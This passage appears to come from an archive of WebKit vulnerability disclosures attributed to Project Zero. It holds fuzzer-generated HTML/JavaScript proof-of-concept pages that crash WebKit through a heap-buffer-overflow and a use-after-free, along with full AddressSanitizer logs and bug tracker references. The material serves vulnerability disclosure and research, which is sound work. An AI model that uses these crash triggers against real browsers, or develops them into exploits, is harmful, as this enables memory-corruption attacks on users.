    #26 0x10b0210fe in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe000fe)
    #27 0x10a602ea8 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3e1ea8)
    #28 0x10a375b7e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x154b7e)
    #29 0x10a37701e in IPC::Connection::dispatchIncomingMessages() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x15601e)

SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb8619) in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const
Shadow bytes around the buggy address:
  0x1c24000154f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x1c2400015500: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
  0x1c2400015510: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x1c2400015520: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x1c2400015530: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
=>0x1c2400015540: fa fa fa fa fa fa fa fa fd fd[fd]fd fd fd fd fd
  0x1c2400015550: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x1c2400015560: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x1c2400015570: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x1c2400015580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c2400015590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==69238==ABORTING


WebKit bug tracker link: https://bugs.webkit.org/show_bug.cgi?id=186918
Apple product security report ID: 693712353
-->
HireHackking 
<!--
There is a out-of-bounds read security vulnerability in WebKit. The vulnerability was confirmed on the ASan build of WebKit revision 233419 on OSX. The vulnerability has also been confirmed on Safari 11.1.1 sources grabbed from https://svn.webkit.org/repository/webkit/releases/Apple/Safari%2011.1.1/

PoC:

=================================================================
-->

<style>
* { -webkit-logical-width: 1px; -webkit-perspective: 1px;  }
</style>
<script>
function jsfuzzer() {
  var htmlvar00011 = document.getElementById("htmlvar00011");
  var htmlvar00019 = document.getElementById("htmlvar00019");
  var htmlvar00049 = document.getElementById("htmlvar00049");
  var htmlvar00005 = document.getElementById("htmlvar00005");
  document.documentElement.appendChild(htmlvar00019);
  htmlvar00004.insertAdjacentHTML("beforeBegin",'<optgroup id="htmlvar00005"><option>1</option></optgroup>');
  htmlvar00004.options.add(htmlvar00023);
  htmlvar00011.appendChild(htmlvar00044);
  document.body.insertAdjacentHTML("beforeBegin",'<track id="htmlvar00003">aaaaaaaa<select><textarea></textarea>');
  document.execCommand("styleWithCSS", false, false);
  document.getElementById('htmlvar00003').appendChild(htmlvar00049);
  document.body.style.cssFloat = "right";
  htmlvar00011.selected = true;
}
</script>
<body onload=jsfuzzer()>
<select id="htmlvar00004" dir="rtl">
<option id="htmlvar00011">oH{I</option>
</select>
</body>
<div id="htmlvar00019">
<h3>
<option id="htmlvar00023" selected="selected">H;<%/IXwS1S:tOT[</option>
<div id="htmlvar00044">
<h2>j3ci</h2>
<textarea id="htmlvar00049">p85_0u</textarea>

<!--
=================================================================

ASan log:

=================================================================
==26550==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000b5b1f at pc 0x000510042e78 bp 0x7ffeeba9d0a0 sp 0x7ffeeba9d098
READ of size 1 at 0x6020000b5b1f thread T0
==26550==WARNING: invalid path to external symbolizer!
==26550==WARNING: Failed to use and restart external symbolizer!
    #0 0x510042e77 in WTF::StringImpl::at(unsigned int) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x42e77)
    #1 0x5135a0844 in WebCore::InlineTextBox::isLineBreak() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35a0844)
    #2 0x5135a27a8 in WebCore::InlineTextBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35a27a8)
    #3 0x513598601 in WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3598601)
    #4 0x5139717c1 in WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39717c1)
    #5 0x513849055 in WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, WebCore::PaintInfo&, WebCore::LayoutPoint const&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3849055)
    #6 0x5135cde84 in WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35cde84)
    #7 0x5135cf115 in WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35cf115)
    #8 0x5135cdb03 in WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35cdb03)
    #9 0x5137027fd in WebCore::RenderElement::paintAsInlineBlock(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37027fd)
    #10 0x5135ce5da in WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool, WebCore::RenderBlock::PaintBlockType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35ce5da)
    #11 0x51371d33e in WebCore::RenderFlexibleBox::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x371d33e)
    #12 0x5135cdf8b in WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35cdf8b)
    #13 0x5135cf115 in WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35cf115)
    #14 0x5135cdb03 in WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35cdb03)
    #15 0x5137d9f68 in WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow, 16ul> const&, WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d9f68)
    #16 0x5137d6967 in WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow, 16ul> const&, WebCore::GraphicsContext&, WebCore::GraphicsContext&, WebCore::LayoutRect const&, bool, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d6967)
    #17 0x5137d0ef8 in WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d0ef8)
    #18 0x5137cdeb1 in WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37cdeb1)
    #19 0x5137d65f9 in WebCore::RenderLayer::paintList(WTF::Vector<WebCore::RenderLayer*, 0ul, WTF::CrashOnOverflow, 16ul>*, WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d65f9)
    #20 0x5137d0fa2 in WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d0fa2)
    #21 0x5137cdeb1 in WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37cdeb1)
    #22 0x5137d65f9 in WebCore::RenderLayer::paintList(WTF::Vector<WebCore::RenderLayer*, 0ul, WTF::CrashOnOverflow, 16ul>*, WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d65f9)
    #23 0x5137d0fa2 in WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d0fa2)
    #24 0x5137cdeb1 in WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37cdeb1)
    #25 0x5137d65f9 in WebCore::RenderLayer::paintList(WTF::Vector<WebCore::RenderLayer*, 0ul, WTF::CrashOnOverflow, 16ul>*, WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d65f9)
    #26 0x5137d0fa2 in WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d0fa2)
    #27 0x513802488 in WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, WebCore::IntRect const&, unsigned int, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3802488)
    #28 0x513802e36 in WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3802e36)
    #29 0x5132583a8 in WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, WebCore::FloatRect const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x32583a8)
    #30 0x5132cfd80 in WebCore::GraphicsLayerCA::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x32cfd80)
    #31 0x5109abcf8 in WebCore::PlatformCALayer::drawLayerContents(CGContext*, WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul, WTF::CrashOnOverflow, 16ul>&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9abcf8)
    #32 0x513302a3a in WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3302a3a)
    #33 0x510c52ca8 in -[WebSimpleLayer drawInContext:] (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc52ca8)
    #34 0x7fff39bed5b5 in CABackingStoreUpdate_ (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x215b5)
    #35 0x7fff39bed47e in invocation function for block in CA::Layer::display_() (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x2147e)
    #36 0x7fff39becd05 in -[CALayer _display] (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x20d05)
    #37 0x510c5294c in -[WebSimpleLayer display] (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc5294c)
    #38 0x7fff39bdde4c in CA::Layer::display_if_needed(CA::Transaction*) (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x11e4c)
    #39 0x7fff39bdd90a in CA::Layer::layout_and_display_if_needed(CA::Transaction*) (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x1190a)
    #40 0x7fff39bdc8fb in CA::Context::commit_transaction(CA::Transaction*) (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x108fb)
    #41 0x7fff39bdc494 in CA::Transaction::commit() (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x10494)
    #42 0x7fff39be8959 in CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, void*) (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x1c959)
    #43 0x7fff2e899466 in __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa3466)
    #44 0x7fff2e89938e in __CFRunLoopDoObservers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa338e)
    #45 0x7fff2e87b1de in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x851de)
    #46 0x7fff2db61d95 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fd95)
    #47 0x7fff2db61b05 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb05)
    #48 0x7fff2db61883 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f883)
    #49 0x7fff2be13a72 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41a72)
    #50 0x7fff2c5a9e33 in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7e33)
    #51 0x7fff2be08884 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36884)
    #52 0x7fff2bdd7a71 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5a71)
    #53 0x7fff569e3dc6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x10dc6)
    #54 0x7fff569e2a19 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xfa19)
    #55 0x10415d4c6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014c6)
    #56 0x7fff56689014 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1014)

0x6020000b5b1f is located 6 bytes to the right of 9-byte region [0x6020000b5b10,0x6020000b5b19)
allocated by thread T0 here:
    #0 0x1083ada3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
    #1 0x7fff568321bc in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x21bc)
    #2 0x51fa29734 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xef734)
    #3 0x51fa25e3d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xebe3d)
    #4 0x51f985a3b in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x4ba3b)
    #5 0x51f984d8a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x4ad8a)
    #6 0x51f9ed83c in WTF::StringBuffer<unsigned char>::StringBuffer(unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xb383c)
    #7 0x51f9e2245 in WTF::Ref<WTF::StringImpl, WTF::DumbPtrTraits<WTF::StringImpl> > WTF::StringImpl::simplifyMatchedCharactersToSpace<unsigned char, bool (*)(unsigned short)>(bool (*)(unsigned short)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xa8245)
    #8 0x51f9e213c in WTF::StringImpl::simplifyWhiteSpace(bool (*)(unsigned short)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xa813c)
    #9 0x51fa1b046 in WTF::String::simplifyWhiteSpace(bool (*)(unsigned short)) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xe1046)
    #10 0x51295133a in WebCore::HTMLOptionElement::displayLabel() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x295133a)
    #11 0x512951772 in WebCore::HTMLOptionElement::textIndentedToRespectGroupLabel() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2951772)
    #12 0x513882a9d in WebCore::RenderMenuList::setTextFromOption(int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3882a9d)
    #13 0x51296c49e in WebCore::HTMLSelectElement::selectOption(int, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x296c49e)
    #14 0x51294ef0c in WebCore::HTMLOptionElement::setSelected(bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294ef0c)
    #15 0x510c05b3a in WebCore::setJSHTMLOptionElementSelectedSetter(JSC::ExecState&, WebCore::JSHTMLOptionElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc05b3a)
    #16 0x510be8876 in bool WebCore::IDLAttribute<WebCore::JSHTMLOptionElement>::set<&(WebCore::setJSHTMLOptionElementSelectedSetter(JSC::ExecState&, WebCore::JSHTMLOptionElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, long long, long long, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xbe8876)
    #17 0x521dc1978 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2487978)
    #18 0x521dc1ab1 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2487ab1)
    #19 0x521f65fd5 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x262bfd5)
    #20 0x521a61fa1 in llint_slow_path_put_by_id (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2127fa1)
    #21 0x51fa4932b in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10f32b)
    #22 0x51fa4c9b8 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1129b8)
    #23 0x51fa45fea in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10bfea)
    #24 0x5217a5644 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e6b644)
    #25 0x521d750d9 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x243b0d9)
    #26 0x521d7526b in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x243b26b)
    #27 0x521d75611 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x243b611)
    #28 0x511e94868 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e94868)
    #29 0x511ee240c in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1ee240c)

SUMMARY: AddressSanitizer: heap-buffer-overflow (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x42e77) in WTF::StringImpl::at(unsigned int) const
Shadow bytes around the buggy address:
  0x1c0400016b10: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa 00 00
  0x1c0400016b20: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x1c0400016b30: fa fa fd fd fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x1c0400016b40: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fd
  0x1c0400016b50: fa fa fd fd fa fa fd fd fa fa 00 00 fa fa 02 fc
=>0x1c0400016b60: fa fa 00[01]fa fa fd fa fa fa 00 00 fa fa fd fa
  0x1c0400016b70: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fa
  0x1c0400016b80: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
  0x1c0400016b90: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
  0x1c0400016ba0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa 00 00
  0x1c0400016bb0: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==26550==ABORTING


WebKit bug tracker link: https://bugs.webkit.org/show_bug.cgi?id=187251
Apple product security report ID: 694275579
-->
HireHackking 
<!--
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on the ASan build of WebKit revision 233006 on OSX.

PoC:

=================================================================
-->

<style>
.class1 { -webkit-mask-box-image-source: url(#foo); }
</style>
<script>
function freememory() {
 var a;
 for(var i=0;i<100;i++) {
   a = new Uint8Array(1024*1024);
 }
 document.implementation.createHTMLDocument("doc");
}
function jsfuzzer() {
try { var00097 = document.createElement("source"); } catch(e) { }
try { var00097.addEventListener("DOMSubtreeModified", eventhandler5); } catch(e) { }
try { var00097.setAttribute("onsubmit", "eventhandler3()"); } catch(e) { }
}
function eventhandler1() {
/* newvar{htmlvar00027:HTMLDataListElement} */ var htmlvar00027 = document.createElement("datalist"); //HTMLDataListElement
try { /* */ var var00060 = eventhandler4; } catch(e) { }
try { htmlvar00010.appendChild(htmlvar00009); } catch(e) { }
try { document.title = "foo"; } catch(e) { }
try { htmlvar00027.addEventListener("DOMNodeInsertedIntoDocument", var00060); } catch(e) { }
try { htmlvar00008.appendChild(htmlvar00027); } catch(e) { }
freememory();
}
function eventhandler4() {
try { var var00167 = document.createRange(); } catch(e) { }
try { var00167.setEndAfter(htmlvar00015); } catch(e) { }
try { var00167.deleteContents(); } catch(e) { }
}
function eventhandler5() {
try { htmlvar00008.setAttribute("onbeforeload", "eventhandler1()"); } catch(e) { }
try { htmlvar00010.addEventListener("DOMNodeRemovedFromDocument", eventhandler1); } catch(e) { }
try { /* newvar{var00107:Element} */ var var00107 = htmlvar00004.querySelector("title");  } catch(e) { }
try { htmlvar00010.replaceWith(var00107); } catch(e) { }
}
</script>
<body onload=jsfuzzer()>
<li class="class1">a</li>
<object id="htmlvar00008">
<param id="htmlvar00009"></param>
</object>
<select id="htmlvar00010">
<option id="htmlvar00015">a</option>

<!--
=================================================================

ASan log:

=================================================================
==69151==ERROR: AddressSanitizer: heap-use-after-free on address 0x60800006aa34 at pc 0x00011465061a bp 0x7ffee1997330 sp 0x7ffee1997328
READ of size 4 at 0x60800006aa34 thread T0
